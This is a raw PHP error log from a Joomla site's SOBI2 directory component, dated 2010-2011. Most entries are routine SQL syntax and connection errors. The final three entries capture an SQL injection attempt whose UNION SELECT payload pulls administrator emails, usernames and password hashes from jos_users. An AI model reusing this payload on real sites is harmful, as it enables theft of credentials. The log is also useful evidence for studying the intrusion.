2010-10-07 12:43:14: 
	 IP: 82.144.206.32 
	 Requestet URI: /administrator/index2.php 
	 Refferer: http://akademinform.com.ua/administrator/index2.php?option=com_sobi2&task=edit&sobi2Id=6&hidemainmenu=1&returnTask=listing&catid=-1 
	 Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
	 Error: Not allowed tag (form)in input. Entry number: 6. Tag has been removed (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/components/com_sobi2/sobi2.class.php at the line: 1480. 
---------------------------------------------------------
2010-10-07 12:43:33: 
	 IP: 82.144.206.32 
	 Requestet URI: /administrator/index2.php 
	 Refferer: http://akademinform.com.ua/administrator/index2.php?option=com_sobi2&task=edit&sobi2Id=6&hidemainmenu=1&returnTask=listing&catid=-1 
	 Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
	 Error: Not allowed tag (form)in input. Entry number: 6. Tag has been removed (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/components/com_sobi2/sobi2.class.php at the line: 1480. 
---------------------------------------------------------
2010-10-17 08:46:38: 
	 IP: 93.73.253.174 
	 Requestet URI: /administrator/index2.php 
	 Refferer: http://akademinform.com.ua/administrator/index2.php?option=com_sobi2&task=listing&catid=2 
	 Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
	 Error: DB reports: DB function failed with error number 1064<br /><font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1 SQL=UPDATE `jos_sobi2_categories` SET `ordering` = '16' WHERE `catid` =  LIMIT 1</font> (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/administrator/components/com_sobi2/admin.sobi2.cats.php at the line: 122. 
---------------------------------------------------------
2010-10-17 08:46:39: 
	 IP: 93.73.253.174 
	 Requestet URI: /administrator/index2.php 
	 Refferer: http://akademinform.com.ua/administrator/index2.php?option=com_sobi2&task=listing&catid=2 
	 Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
	 Error: DB reports: DB function failed with error number 1064<br /><font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1 SQL=UPDATE `jos_sobi2_categories` SET `ordering` = '15' WHERE `catid` =  LIMIT 1</font> (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/administrator/components/com_sobi2/admin.sobi2.cats.php at the line: 122. 
---------------------------------------------------------
2010-10-17 08:46:44: 
	 IP: 93.73.253.174 
	 Requestet URI: /administrator/index2.php 
	 Refferer: http://akademinform.com.ua/administrator/index2.php?option=com_sobi2&task=listing&catid=2 
	 Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
	 Error: DB reports: DB function failed with error number 1064<br /><font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1 SQL=UPDATE `jos_sobi2_categories` SET `ordering` = '14' WHERE `catid` =  LIMIT 1</font> (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/administrator/components/com_sobi2/admin.sobi2.cats.php at the line: 122. 
---------------------------------------------------------
2010-10-17 08:46:48: 
	 IP: 93.73.253.174 
	 Requestet URI: /administrator/index2.php 
	 Refferer: http://akademinform.com.ua/administrator/index2.php?option=com_sobi2&task=listing&catid=2 
	 Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
	 Error: DB reports: DB function failed with error number 1064<br /><font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1 SQL=UPDATE `jos_sobi2_categories` SET `ordering` = '7' WHERE `catid` =  LIMIT 1</font> (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/administrator/components/com_sobi2/admin.sobi2.cats.php at the line: 174. 
---------------------------------------------------------
2010-10-17 08:46:57: 
	 IP: 93.73.253.174 
	 Requestet URI: /administrator/index2.php 
	 Refferer: http://akademinform.com.ua/administrator/index2.php?option=com_sobi2&task=listing&catid=2 
	 Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
	 Error: DB reports: DB function failed with error number 1064<br /><font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1 SQL=UPDATE `jos_sobi2_categories` SET `ordering` = '13' WHERE `catid` =  LIMIT 1</font> (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/administrator/components/com_sobi2/admin.sobi2.cats.php at the line: 122. 
---------------------------------------------------------
2010-10-17 08:46:59: 
	 IP: 93.73.253.174 
	 Requestet URI: /administrator/index2.php 
	 Refferer: http://akademinform.com.ua/administrator/index2.php?option=com_sobi2&task=listing&catid=2 
	 Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
	 Error: DB reports: DB function failed with error number 1064<br /><font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1 SQL=UPDATE `jos_sobi2_categories` SET `ordering` = '12' WHERE `catid` =  LIMIT 1</font> (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/administrator/components/com_sobi2/admin.sobi2.cats.php at the line: 122. 
---------------------------------------------------------
2010-10-17 08:47:01: 
	 IP: 93.73.253.174 
	 Requestet URI: /administrator/index2.php 
	 Refferer: http://akademinform.com.ua/administrator/index2.php?option=com_sobi2&task=listing&catid=2 
	 Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
	 Error: DB reports: DB function failed with error number 1064<br /><font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1 SQL=UPDATE `jos_sobi2_categories` SET `ordering` = '11' WHERE `catid` =  LIMIT 1</font> (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/administrator/components/com_sobi2/admin.sobi2.cats.php at the line: 122. 
---------------------------------------------------------
2010-10-17 08:47:02: 
	 IP: 93.73.253.174 
	 Requestet URI: /administrator/index2.php 
	 Refferer: http://akademinform.com.ua/administrator/index2.php?option=com_sobi2&task=listing&catid=2 
	 Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
	 Error: DB reports: DB function failed with error number 1064<br /><font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1 SQL=UPDATE `jos_sobi2_categories` SET `ordering` = '10' WHERE `catid` =  LIMIT 1</font> (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/administrator/components/com_sobi2/admin.sobi2.cats.php at the line: 122. 
---------------------------------------------------------
2010-10-17 08:47:12: 
	 IP: 93.73.253.174 
	 Requestet URI: /administrator/index2.php 
	 Refferer: http://akademinform.com.ua/administrator/index2.php?option=com_sobi2&task=listing&catid=2 
	 Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
	 Error: DB reports: DB function failed with error number 1064<br /><font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1 SQL=UPDATE `jos_sobi2_categories` SET `ordering` = '5' WHERE `catid` =  LIMIT 1</font> (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/administrator/components/com_sobi2/admin.sobi2.cats.php at the line: 174. 
---------------------------------------------------------
2010-10-17 08:47:13: 
	 IP: 93.73.253.174 
	 Requestet URI: /administrator/index2.php 
	 Refferer: http://akademinform.com.ua/administrator/index2.php?option=com_sobi2&task=listing&catid=2 
	 Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
	 Error: DB reports: DB function failed with error number 1064<br /><font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1 SQL=UPDATE `jos_sobi2_categories` SET `ordering` = '6' WHERE `catid` =  LIMIT 1</font> (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/administrator/components/com_sobi2/admin.sobi2.cats.php at the line: 174. 
---------------------------------------------------------
2010-10-17 09:43:22: 
	 IP: 93.73.253.174 
	 Requestet URI: /administrator/index2.php 
	 Refferer: http://akademinform.com.ua/administrator/index2.php?option=com_sobi2&task=listing&catid=2 
	 Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
	 Error: DB reports: DB function failed with error number 1064<br /><font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1 SQL=UPDATE `jos_sobi2_categories` SET `ordering` = '19' WHERE `catid` =  LIMIT 1</font> (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/administrator/components/com_sobi2/admin.sobi2.cats.php at the line: 122. 
---------------------------------------------------------
2010-11-03 08:12:24: 
	 IP: 67.195.112.223 
	 Requestet URI: /index.php?option=com_sobi2&sobi2Task=rss&no_html=1&catid=22&Itemid=0 
	 Refferer: none 
	 Browser: Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)
	 Error: sobi2category::getCategory(): DB reports: DB function failed with error number 2006<br /><font color="red">MySQL server has gone away SQL=SELECT * FROM `jos_sobi2_categories` WHERE `catid` = 22 LIMIT 1</font> (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/components/com_sobi2/category.class.php at the line: 75. 
---------------------------------------------------------
2010-11-03 08:14:56: 
	 IP: 67.195.112.223 
	 Requestet URI: /index.php?option=com_sobi2&sobi2Task=rss&no_html=1&catid=20&Itemid=0 
	 Refferer: none 
	 Browser: Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)
	 Error: sobi2category::getCategory(): DB reports: DB function failed with error number 2006<br /><font color="red">MySQL server has gone away SQL=SELECT * FROM `jos_sobi2_categories` WHERE `catid` = 20 LIMIT 1</font> (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/components/com_sobi2/category.class.php at the line: 75. 
---------------------------------------------------------
2010-12-08 00:39:21: 
	 IP: 93.73.241.94 
	 Requestet URI: /administrator/index2.php 
	 Refferer: http://akademinform.com.ua/administrator/index2.php?option=com_sobi2&task=listing&catid=12 
	 Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
	 Error: DB reports: DB function failed with error number 1064<br /><font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1 SQL=UPDATE `jos_sobi2_categories` SET `ordering` = '21' WHERE `catid` =  LIMIT 1</font> (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/administrator/components/com_sobi2/admin.sobi2.cats.php at the line: 122. 
---------------------------------------------------------
2010-12-08 00:39:34: 
	 IP: 93.73.241.94 
	 Requestet URI: /administrator/index2.php 
	 Refferer: http://akademinform.com.ua/administrator/index2.php?option=com_sobi2&task=listing&catid=12 
	 Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
	 Error: DB reports: DB function failed with error number 1064<br /><font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1 SQL=UPDATE `jos_sobi2_categories` SET `ordering` = '20' WHERE `catid` =  LIMIT 1</font> (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/administrator/components/com_sobi2/admin.sobi2.cats.php at the line: 122. 
---------------------------------------------------------
2010-12-08 00:39:55: 
	 IP: 93.73.241.94 
	 Requestet URI: /administrator/index2.php 
	 Refferer: http://akademinform.com.ua/administrator/index2.php?option=com_sobi2&task=listing&catid=12 
	 Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
	 Error: DB reports: DB function failed with error number 1064<br /><font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1 SQL=UPDATE `jos_sobi2_categories` SET `ordering` = '19' WHERE `catid` =  LIMIT 1</font> (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/administrator/components/com_sobi2/admin.sobi2.cats.php at the line: 122. 
---------------------------------------------------------
2010-12-15 22:18:31: 
	 IP: 93.73.241.94 
	 Requestet URI: /administrator/index2.php 
	 Refferer: http://akademinform.com.ua/administrator/index2.php?option=com_sobi2&task=listing&catid=12 
	 Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
	 Error: DB reports: DB function failed with error number 1064<br /><font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1 SQL=UPDATE `jos_sobi2_categories` SET `ordering` = '23' WHERE `catid` =  LIMIT 1</font> (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/administrator/components/com_sobi2/admin.sobi2.cats.php at the line: 122. 
---------------------------------------------------------
2011-01-01 21:59:13: 
	 IP: 93.73.253.174 
	 Requestet URI: /administrator/index2.php 
	 Refferer: http://akademinform.com.ua/administrator/index2.php?option=com_sobi2 
	 Browser: Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.62 Version/11.00
	 Error: DB reports: DB function failed with error number 1064<br /><font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1 SQL=UPDATE `jos_sobi2_categories` SET `ordering` = '23' WHERE `catid` =  LIMIT 1</font> (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/administrator/components/com_sobi2/admin.sobi2.cats.php at the line: 122. 
---------------------------------------------------------
2011-01-25 17:19:32: 
	 IP: 78.25.19.76 
	 Requestet URI: /index.php?option=com_sobi2&catid=8&Itemid=0& 
	 Refferer: http://akademinform.com.ua/ 
	 Browser: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 ( .NET CLR 3.5.30729; .NET4.0C)
	 Error: sobi2Config::import(): File /var/www/akademinform/akademinform.com.ua/components/com_sobi2/sobi2.listing.php does not exist or is not readable. (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/components/com_sobi2/config.class.php at the line: 1419. 
---------------------------------------------------------
2011-02-01 12:13:13: 
	 IP: 93.73.253.174 
	 Requestet URI: /administrator/index2.php 
	 Refferer: http://akademinform.com.ua/administrator/index2.php?option=com_sobi2&task=listing&catid=49 
	 Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
	 Error: DB reports: DB function failed with error number 1064<br /><font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1 SQL=UPDATE `jos_sobi2_categories` SET `ordering` = '36' WHERE `catid` =  LIMIT 1</font> (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/administrator/components/com_sobi2/admin.sobi2.cats.php at the line: 122. 
---------------------------------------------------------
2011-12-07 03:41:47: 
	 IP: 88.208.19.148 
	 Requestet URI: /index.php?option=com_sobi2& 
	 Refferer: http://akademinform.com.ua/index.php 
	 Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10
	 Error: HTML_SOBI::buildCustomListing(): DB reports: DB function failed with error number 1222<br /><font color="red">The used SELECT statements have a different number of columns SQL=SELECT * FROM jos_sobi2_categories WHERE catid IN(1) union select 1,concat(0x5b4834485d,email,0x3a,username,0x3a,password,0x5b2f4834485d),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 from jos_users where gid in (25,24) and block=0 #) AND published = 1  ORDER BY name</font> (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/components/com_sobi2/includes/custom.listing.php at the line: 213. 
---------------------------------------------------------
2011-12-07 03:41:47: 
	 IP: 88.208.19.148 
	 Requestet URI: /index.php?option=com_sobi2& 
	 Refferer: http://akademinform.com.ua/index.php 
	 Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10
	 Error: HTML_SOBI::getCats(): DB reports: DB function failed with error number 1222<br /><font color="red">The used SELECT statements have a different number of columns SQL=SELECT catid, itemid FROM jos_sobi2_cat_items_relations WHERE itemid IN (1) union select 1,concat(0x5b4834485d,email,0x3a,username,0x3a,password,0x5b2f4834485d),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 from jos_users where gid in (25,24) and block=0 #) AND catid > 1 GROUP BY itemid</font> (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/components/com_sobi2/includes/custom.listing.php at the line: 761. 
---------------------------------------------------------
2011-12-07 03:41:47: 
	 IP: 88.208.19.148 
	 Requestet URI: /index.php?option=com_sobi2& 
	 Refferer: http://akademinform.com.ua/index.php 
	 Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10
	 Error: HTML_SOBI::buildCustomListing(): DB reports: DB function failed with error number 1222<br /><font color="red">The used SELECT statements have a different number of columns SQL=SELECT COUNT(*) FROM jos_sobi2_item WHERE itemid IN(1) union select 1,concat(0x5b4834485d,email,0x3a,username,0x3a,password,0x5b2f4834485d),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 from jos_users where gid in (25,24) and block=0 #)  AND ( published = 1 AND ( publish_down > '2011-12-07 03:41:47' OR publish_down = '0000-00-00 00:00:00' ) )</font> (Error number:512) in file: /var/www/akademinform/akademinform.com.ua/components/com_sobi2/includes/custom.listing.php at the line: 365. 
---------------------------------------------------------
